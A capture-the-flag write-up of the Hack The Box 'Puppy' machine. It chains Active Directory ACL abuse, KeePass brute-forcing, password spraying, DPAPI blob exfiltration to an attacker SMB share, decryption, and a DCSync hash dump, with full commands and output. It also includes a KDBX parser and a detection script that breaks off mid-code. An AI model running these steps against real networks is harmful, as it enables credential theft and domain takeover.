Hack The Box: Puppy
Puppy is a medium-difficulty machine from Hack The Box. SMB enumeration showed readable shares –> Found KeePass database in shares –> Discovered DPAPI master key on the box –> Used master key to decrypt KeePass database –> Extracted AD user credentials from KeePass –> Identified DCSync privileges on compromised user –> Performed DCSync attack to dump domain hashes –> Used Evil-WinRM to get full control of DC
Enumeration
Nmap Scan
nmap 10.129.75.228 -A -v -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-20 13:37 CDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:37
Completed Parallel DNS resolution of 1 host. at 13:37, 0.04s elapsed
Initiating Connect Scan at 13:37
Scanning 10.129.75.228 [1000 ports]
Discovered open port 111/tcp on 10.129.75.228
Discovered open port 53/tcp on 10.129.75.228
Discovered open port 135/tcp on 10.129.75.228
Discovered open port 139/tcp on 10.129.75.228
Discovered open port 445/tcp on 10.129.75.228
Discovered open port 3268/tcp on 10.129.75.228
Discovered open port 389/tcp on 10.129.75.228
Discovered open port 88/tcp on 10.129.75.228
Discovered open port 636/tcp on 10.129.75.228
Discovered open port 464/tcp on 10.129.75.228
Discovered open port 3260/tcp on 10.129.75.228
Discovered open port 593/tcp on 10.129.75.228
Discovered open port 2049/tcp on 10.129.75.228
Discovered open port 3269/tcp on 10.129.75.228
Completed Connect Scan at 13:37, 11.52s elapsed (1000 total ports)
Initiating Service scan at 13:37
Scanning 14 services on 10.129.75.228
Completed Service scan at 13:39, 114.20s elapsed (14 services on 1 host)
NSE: Script scanning 10.129.75.228.
Initiating NSE at 13:39
Completed NSE at 13:39, 40.12s elapsed
Initiating NSE at 13:39
Completed NSE at 13:40, 50.47s elapsed
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
Nmap scan report for 10.129.75.228
Host is up (0.068s latency).
Not shown: 986 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-21 01:39:04Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3 2049/udp nfs
| 100005 1,2,3 2049/udp mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100024 1 2049/tcp status
|_ 100024 1 2049/udp status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h01m39s
| smb2-time:
|   date: 2025-05-21T01:40:53
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
The scan shows the following ports of interest:
- 88 (Kerberos)
- 135 (MSRPC)
- 139/445 (SMB)
- 389/636 (LDAP/LDAPS)
The assessment began with a known credential pair for the domain user levi.james (KingofAkron2025!), disclosed as part of the initial engagement scope.
For enumeration, we used SMBMap to identify the available SMB shares and assess the level of access granted to the authenticated user.
From the SMBMap output above, there is an interesting share called "DEV", but levi.james has NO ACCESS to it with these initial creds. So let's fire up BloodHound and check whether any relationship can lead to access to the DEV share.
From the BloodHound graph above, our initial user "levi.james" is a member of the "HR" group, which has GenericWrite on the "Developers" group. So let's go ahead and add ourselves to that group:
└─$ net rpc group addmem "developers" "levi.james" -U 'PUPPY/levi.james%KingofAkron2025!' -S 10.129.75.228
Now that we have successfully added ourselves to the group, let's check that we really are a member of the Developers group now:
└─$ net rpc group members "developers" -U 'PUPPY/levi.james%KingofAkron2025!' -S 10.129.75.228
PUPPY\levi.james
PUPPY\ant.edwards
PUPPY\adam.silver
PUPPY\jamie.williams
And here we are: the output shows that levi.james is now a member of "Developers".
Running SMBMap again shows that the "DEV" share is now accessible with the same user "levi.james". So what are we waiting for? Let's access the share:
└─$ smbclient -U "levi.james" //10.129.75.228/DEV
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Mar 23 02:07:57 2025
.. D 0 Sat Mar 8 10:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 02:09:12 2025
Projects D 0 Sat Mar 8 10:53:36 2025
recovery.kdbx A 2677 Tue Mar 11 21:25:46 2025
We found a KeePassXC database file (recovery.kdbx) on the share \\10.129.75.228\DEV.
The first thing that came to mind was to crack it using keepass2john + john,
but that failed with an error:
└─$ keepass2john recovery.kdbx > hash.txt
! recovery.kdbx : File version '40000' is currently not supported!
The file is version 40000 (the KDBX 4 format), which corresponds to KeePassXC 2.7+ and is not supported by keepass2john.
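The "40000" in that error is the file's version field read as hex (0x00040000: major 4, minor 0). As an added example, not code from the writeup, here is a small parser for the plaintext outer header of a KDBX 4 file that reads the version and the KDF cost settings (the Argon2 memory and iteration values that bound how fast a wordlist can be tried against the vault); the header it parses is constructed by `build_sample_header()` and is not taken from recovery.kdbx.

```python
import struct
import uuid

SIG1, SIG2 = 0x9AA2D903, 0xB54BFB67            # KDBX file signature (little-endian)
KDF_NAMES = {                                   # KDF UUIDs defined by KeePass 2.x
    uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c"): "Argon2d",
    uuid.UUID("9e298b19-56db-4773-b23d-fc3ec6f0a1e6"): "Argon2id",
    uuid.UUID("c9d9f39a-628a-4460-bf74-0d08c18a4fea"): "AES-KDF",
}
_NUM = {0x04: "<I", 0x05: "<Q", 0x0C: "<i", 0x0D: "<q"}   # VariantDictionary numeric types


def parse_variant_dict(data):
    """Decode the VariantDictionary that carries the KDF parameters in KDBX 4."""
    if data[1] != 0x01:                         # version 0x0100: high byte must be 1
        raise ValueError("unsupported VariantDictionary version")
    pos, out = 2, {}
    while data[pos] != 0x00:                    # a 0x00 type byte ends the dictionary
        vtype, klen = data[pos], struct.unpack_from("<i", data, pos + 1)[0]
        key, pos = data[pos + 5:pos + 5 + klen].decode(), pos + 5 + klen
        vlen = struct.unpack_from("<i", data, pos)[0]
        raw, pos = data[pos + 4:pos + 4 + vlen], pos + 4 + vlen
        if vtype in _NUM:                       # UInt32 / UInt64 / Int32 / Int64
            out[key] = struct.unpack(_NUM[vtype], raw)[0]
        elif vtype == 0x18:                     # UTF-8 string
            out[key] = raw.decode()
        else:                                   # 0x42 byte array ($UUID, salt) or 0x08 bool
            out[key] = raw if vtype == 0x42 else raw != b"\x00"
    return out


def parse_kdbx_header(blob):
    """Return version and KDF cost settings from a KDBX 4 outer header."""
    sig1, sig2, ver = struct.unpack_from("<III", blob, 0)
    if (sig1, sig2) != (SIG1, SIG2):
        raise ValueError("not a KDBX file")
    major, minor = ver >> 16, ver & 0xFFFF
    if major != 4:                              # KDBX 3 uses 16-bit field sizes; not handled
        raise ValueError(f"KDBX {major}.{minor} header not handled")
    pos, fields = 12, {}
    while True:                                 # KDBX 4 field: id (1 byte), size (4), data
        fid, size = struct.unpack_from("<BI", blob, pos)
        fields[fid] = blob[pos + 5:pos + 5 + size]
        pos += 5 + size
        if fid == 0:                            # EndOfHeader; SHA-256 + HMAC follow
            break
    kdf = parse_variant_dict(fields[11])        # field 11 = KdfParameters
    kdf_id = uuid.UUID(bytes=kdf["$UUID"])
    return {
        "version": f"{major}.{minor}",
        "version_hex": f"{ver:x}",              # the value keepass2john printed: 40000
        "kdf": KDF_NAMES.get(kdf_id, str(kdf_id)),
        "memory_kib": kdf.get("M", 0) // 1024,  # Argon2 memory cost
        "iterations": kdf.get("I", kdf.get("R")),   # Argon2 uses I, AES-KDF uses R
    }


def build_sample_header(mem=64 * 1024 * 1024, iters=2, par=2):
    """Constructed KDBX 4.0 outer header for testing; not taken from a real vault."""
    def vd_entry(vtype, key, raw):
        k = key.encode()
        return bytes([vtype]) + struct.pack("<i", len(k)) + k + struct.pack("<i", len(raw)) + raw
    def field(fid, data):
        return struct.pack("<BI", fid, len(data)) + data
    argon2d = uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c").bytes
    vd = struct.pack("<H", 0x0100) + vd_entry(0x42, "$UUID", argon2d) + vd_entry(0x42, "S", b"\x11" * 32)
    vd += vd_entry(0x04, "P", struct.pack("<I", par)) + vd_entry(0x05, "M", struct.pack("<Q", mem))
    vd += vd_entry(0x05, "I", struct.pack("<Q", iters)) + b"\x00"
    hdr = struct.pack("<III", SIG1, SIG2, 0x00040000)           # version 4.0
    hdr += field(2, uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff").bytes)  # AES-256 cipher
    hdr += field(3, struct.pack("<I", 1)) + field(4, b"\x22" * 32) + field(7, b"\x33" * 16)
    return hdr + field(11, vd) + field(0, b"\r\n\r\n")         # KDF params, EndOfHeader
```

The KDF settings only slow a guessing attack down (they are what keeps keepass4brute to a low attempts-per-minute rate); a dictionary word as the master password defeats that protection regardless.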
After some digging on Google, I found a GitHub repo with a tool that can brute-force this newer file version:
https://github.com/r3nt0n/keepass4brute
I installed the tool on my Kali Linux and used the well-known rockyou.txt wordlist to brute-force the database password:
└─$ sudo ./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 36/14344392 - Attempts per minute: 113 - Estimated time remaining: 12 weeks, 4 days
[+] Current attempt: liverpool
[*] Password found: liverpool
And here we are: the password is "liverpool". We can open the file now and see what is inside.
These are all the creds found in the database:
ADAM SILVER : HJKL2025!
ANTONY C. EDWARDS : Antman2025!
JAMIE WILLIAMSON : JamieLove2025!
SAMUEL BLAKE : ILY2025!
STEVE TUCKER : Steve2025!
Maybe we need to spray these passwords, but first let's enumerate the users in this AD:
crackmapexec smb 10.10.11.70 -u levi.james -p KingofAkron2025! --users
SMB 10.10.11.70 445 DC [+] Enumerated domain user(s)
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper_adm badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\jamie.williams badpwdcount: 1 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\adam.silver badpwdcount: 23 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\ant.edwards badpwdcount: 1 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\levi.james badpwdcount: 5 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB 10.10.11.70 445 DC PUPPY.HTB\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB 10.10.11.70 445 DC PUPPY.HTB\Administrator badpwdcount: 0 desc: Built-in account for administering the computer/domain
After trying all the possible combinations, we found that this one works:
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
So let's run BloodHound again with these creds and see whether there are any new relationships.
From the graph above, our current user "ant.edwards" is a member of "SENIOR DEVS", which has GenericAll on the user "adam.silver". So let's change the password of "adam.silver" using ant.edwards:
└─$ net rpc password "adam.silver" "NewP@ssw0rd2025" -U PUPPY/ant.edwards%Antman2025! -S dc.puppy.htb
└─$ crackmapexec smb 10.10.11.70 -u "adam.silver" -p "NewP@ssw0rd2025"
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:NewP@ssw0rd2025 STATUS_ACCOUNT_DISABLED
The password was changed, but the account is disabled. So let's enable it using ant.edwards:
└─$ bloodyAD --host dc.puppy.htb -d PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' remove uac 'adam.silver' -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from adam.silver's userAccountControl
└─$ evil-winrm -i dc.puppy.htb -u adam.silver -p 'NewP@ssw0rd2025'
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> ls
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2025  12:31 PM           2312 Microsoft Edge.lnk
-ar---        5/30/2025  11:08 AM             34 user.txt
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> cat user.txt
facc2ef8d130a94d6d388658058b1356
Privilege Escalation Phase
*Evil-WinRM* PS C:\> cd Backups
*Evil-WinRM* PS C:\Backups> ls
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/8/2025   8:22 AM        4639546 site-backup-2024-12-30.zip
*Evil-WinRM* PS C:\Backups>download site-backup-2024-12-30.zip
*Evil-WinRM* PS C:\Backups>
Now that we have downloaded the zip file from the Backups directory, we need to unzip it:
└─$ unzip site-backup-2024-12-30.zip
Archive: site-backup-2024-12-30.zip
creating: puppy/
inflating: puppy/nms-auth-config.xml.bak
creating: puppy/images/
inflating: puppy/images/banner.jpg
inflating: puppy/images/jamie.jpg
inflating: puppy/images/antony.jpg
inflating: puppy/images/adam.jpg
inflating: puppy/images/Levi.jpg
creating: puppy/assets/
creating: puppy/assets/js/
inflating: puppy/assets/js/jquery.scrolly.min.js
inflating: puppy/assets/js/util.js
inflating: puppy/assets/js/breakpoints.min.js
inflating: puppy/assets/js/jquery.min.js
inflating: puppy/assets/js/main.js
inflating: puppy/assets/js/jquery.dropotron.min.js
inflating: puppy/assets/js/browser.min.js
creating: puppy/assets/webfonts/
inflating: puppy/assets/webfonts/fa-regular-400.eot
inflating: puppy/assets/webfonts/fa-solid-900.svg
inflating: puppy/assets/webfonts/fa-solid-900.ttf
inflating: puppy/assets/webfonts/fa-solid-900.woff2
inflating: puppy/assets/webfonts/fa-brands-400.svg
inflating: puppy/assets/webfonts/fa-solid-900.woff
inflating: puppy/assets/webfonts/fa-solid-900.eot
inflating: puppy/assets/webfonts/fa-regular-400.ttf
extracting: puppy/assets/webfonts/fa-regular-400.woff2
inflating: puppy/assets/webfonts/fa-regular-400.svg
inflating: puppy/assets/webfonts/fa-brands-400.eot
inflating: puppy/assets/webfonts/fa-brands-400.woff
inflating: puppy/assets/webfonts/fa-brands-400.ttf
inflating: puppy/assets/webfonts/fa-brands-400.woff2
inflating: puppy/assets/webfonts/fa-regular-400.woff
creating: puppy/assets/css/
inflating: puppy/assets/css/main.css
creating: puppy/assets/css/images/
inflating: puppy/assets/css/images/overlay.png
inflating: puppy/assets/css/images/highlight.png
inflating: puppy/assets/css/fontawesome-all.min.css
creating: puppy/assets/sass/
inflating: puppy/assets/sass/main.scss
creating: puppy/assets/sass/libs/
inflating: puppy/assets/sass/libs/_vendor.scss
inflating: puppy/assets/sass/libs/_functions.scss
inflating: puppy/assets/sass/libs/_html-grid.scss
inflating: puppy/assets/sass/libs/_vars.scss
inflating: puppy/assets/sass/libs/_breakpoints.scss
inflating: puppy/assets/sass/libs/_mixins.scss
inflating: puppy/index.html
There is a suspicious file here, nms-auth-config.xml.bak:
└─$ cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>
<ldap-config>
<server>
<host>DC.PUPPY.HTB</host>
<port>389</port>
<base-dn>dc=PUPPY,dc=HTB</base-dn>
<bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
<bind-password>ChefSteph2025!</bind-password>
</server>
<user-attributes>
<attribute name="username" ldap-attribute="uid" />
<attribute name="firstName" ldap-attribute="givenName" />
<attribute name="lastName" ldap-attribute="sn" />
<attribute name="email" ldap-attribute="mail" />
</user-attributes>
<group-attributes>
<attribute name="groupName" ldap-attribute="cn" />
<attribute name="groupMember" ldap-attribute="member" />
</group-attributes>
<search-filter>
<filter>(&(objectClass=person)(uid=%s))</filter>
</search-filter>
</ldap-config>
Now that we have new credentials, steph.cooper : ChefSteph2025!, we can connect as this user.
On the box we discovered DPAPI-protected credentials.
DPAPI = Data Protection API.
Windows uses it to encrypt sensitive data such as saved credentials.
Every user has a MasterKey, itself protected by a key derived from the user's password, and this MasterKey is what encrypts/decrypts the actual data:
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> dir C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials -h
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> dir "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect"
Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/23/2025 2:36 PM S-1-5-21-1487982659-1829050783-2281216199-1107
*Evil-WinRM* PS C:\Users\steph.cooper\Documents>
Let's start an SMB server on our attacker machine and copy the masterkey and the credential blob over to it.
1- On the attacker machine:
┌──(sanke㉿sanke)-[~/Downloads/puppy]
└─$ mkdir -p ./share
┌──(sanke㉿sanke)-[~/Downloads/puppy]
└─$ impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.70,57056)
[*] AUTHENTICATE_MESSAGE (\,DC)
[*] User DC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:share)
[*] Disconnecting Share(1:share)
2- On the victim machine:
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9" \\10.10.14.120\share\credential_blob
*Evil-WinRM* PS C:\Users\steph.cooper\Documents> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" \\10.10.14.120\share\masterkey_blob
We used the known password (ChefSteph2025!) together with the user's SID to decrypt the MasterKey blob with the impacket-dpapi masterkey command:
└─$ impacket-dpapi masterkey -file masterkey_blob -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Yeyy! We have the decrypted key. Let's use it to decrypt the credential blob:
Note: with the MasterKey decrypted, every credential protected by DPAPI for that user can be decrypted.
└─$ impacket-dpapi credential -file credential_blob -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!
New credentials retrieved <3
steph.cooper_adm / FivethChipOnItsWay2025!
As always, the first thing to do is collect BloodHound data with the new creds:
└─$ bloodhound-python -u steph.cooper_adm -p 'FivethChipOnItsWay2025!' -dc puppy.htb -ns 10.10.11.70 -d puppy.htb -c all
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: puppy.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: puppy.htb
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 21 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 49S
Guess what? I think we found a goldmine here!
Our new user has DCSync privileges.
We will now perform a DCSync attack and extract the NTLM hash of the Administrator account.
But first, I want to share something that may help you a lot when it comes to commands and types of attacks: a mindmap that summarises many things in AD.
https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
Let's get back to our attack now. It's easy and straightforward:
└─$ impacket-secretsdump 'puppy.htb'/'steph.cooper_adm':'FivethChipOnItsWay2025!'@'puppy.htb'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUPPY\DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
PUPPY\DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
PUPPY\DC$:des-cbc-md5:54e9a11619f8b9b5
PUPPY\DC$:plain_password_hex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3afb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b419fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fcd48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f03582a9632da8acfc4d992899f3b64fe120e13
PUPPY\DC$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3
dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf
[*] NL$KM
0000 DD 1B A5 A0 33 E7 A0 56 1C 3F C3 F5 86 31 BA 09 ....3..V.?...1..
0010 1A C4 D4 6A 3C 2A FA 15 26 06 3B 93 E0 66 0F 7A ...j<*..&.;..f.z
0020 02 9A C7 2E 52 79 C1 57 D9 0C D3 F6 17 79 EF 3F ....Ry.W.....y.?
0030 75 88 A3 99 C7 E0 2B 27 56 95 5C 6B 85 81 D0 ED u.....+'V.\k....
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d75b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8:::
PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b:::
PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66:::
PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780:::
PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b:::
PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f1173:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c0b23d37b5ad3de31aed317bf6c6fd1f338d9479def408543b85bac046c596c0
Administrator:aes128-cts-hmac-sha1-96:2c74b6df3ba6e461c9d24b5f41f56daf
Administrator:des-cbc-md5:20b9e03d6720150d
krbtgt:aes256-cts-hmac-sha1-96:f2443b54aed754917fd1ec5717483d3423849b252599e59b95dfdcc92c40fa45
krbtgt:aes128-cts-hmac-sha1-96:60aab26300cc6610a05389181e034851
krbtgt:des-cbc-md5:5876d051f78faeba
PUPPY.HTB\levi.james:aes256-cts-hmac-sha1-96:2aad43325912bdca0c831d3878f399959f7101bcbc411ce204c37d585a6417ec
PUPPY.HTB\levi.james:aes128-cts-hmac-sha1-96:661e02379737be19b5dfbe50d91c4d2f
PUPPY.HTB\levi.james:des-cbc-md5:efa8c2feb5cb6da8
PUPPY.HTB\ant.edwards:aes256-cts-hmac-sha1-96:107f81d00866d69d0ce9fd16925616f6e5389984190191e9cac127e19f9b70fc
PUPPY.HTB\ant.edwards:aes128-cts-hmac-sha1-96:a13be6182dc211e18e4c3d658a872182
PUPPY.HTB\ant.edwards:des-cbc-md5:835826ef57bafbc8
PUPPY.HTB\adam.silver:aes256-cts-hmac-sha1-96:670a9fa0ec042b57b354f0898b3c48a7c79a46cde51c1b3bce9afab118e569e6
PUPPY.HTB\adam.silver:aes128-cts-hmac-sha1-96:5d2351baba71061f5a43951462ffe726
PUPPY.HTB\adam.silver:des-cbc-md5:643d0ba43d54025e
PUPPY.HTB\jamie.williams:aes256-cts-hmac-sha1-96:aeddbae75942e03ac9bfe92a05350718b251924e33c3f59fdc183e5a175f5fb2
PUPPY.HTB\jamie.williams:aes128-cts-hmac-sha1-96:d9ac02e25df9500db67a629c3e5070a4
PUPPY.HTB\jamie.williams:des-cbc-md5:cb5840dc1667b615
PUPPY.HTB\steph.cooper:aes256-cts-hmac-sha1-96:799a0ea110f0ecda2569f6237cabd54e06a748c493568f4940f4c1790a11a6aa
PUPPY.HTB\steph.cooper:aes128-cts-hmac-sha1-96:cdd9ceb5fcd1696ba523306f41a7b93e
PUPPY.HTB\steph.cooper:des-cbc-md5:d35dfda40d38529b
PUPPY.HTB\steph.cooper_adm:aes256-cts-hmac-sha1-96:a3b657486c089233675e53e7e498c213dc5872d79468fff14f9481eccfc05ad9
PUPPY.HTB\steph.cooper_adm:aes128-cts-hmac-sha1-96:c23de8b49b6de2fc5496361e4048cf62
PUPPY.HTB\steph.cooper_adm:des-cbc-md5:6231015d381ab691
DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
DC$:des-cbc-md5:7f044607a8dc9710
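From the defender's side, the replication that the dump above relies on is visible on the DC: a DCSync appears as Security event 4662 in which a non-DC account exercises the DS-Replication-Get-Changes / DS-Replication-Get-Changes-All control-access rights on the domain object (this requires directory-service-access auditing and a SACL on the domain head). As an added detection example, not part of the writeup, here is a Python check over JSON-lines records; the sample events, the `svc_dirsync` allowlist entry and the function names are constructed assumptions.

```python
import json

# Control-access-right GUIDs that appear in the Properties field of Security
# event 4662 when an account exercises directory replication rights.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"   # needed to pull secrets
DS_REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPL_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL, DS_REPL_GET_CHANGES_FILTERED}

# Accounts expected to replicate: domain controllers (machine accounts end in "$")
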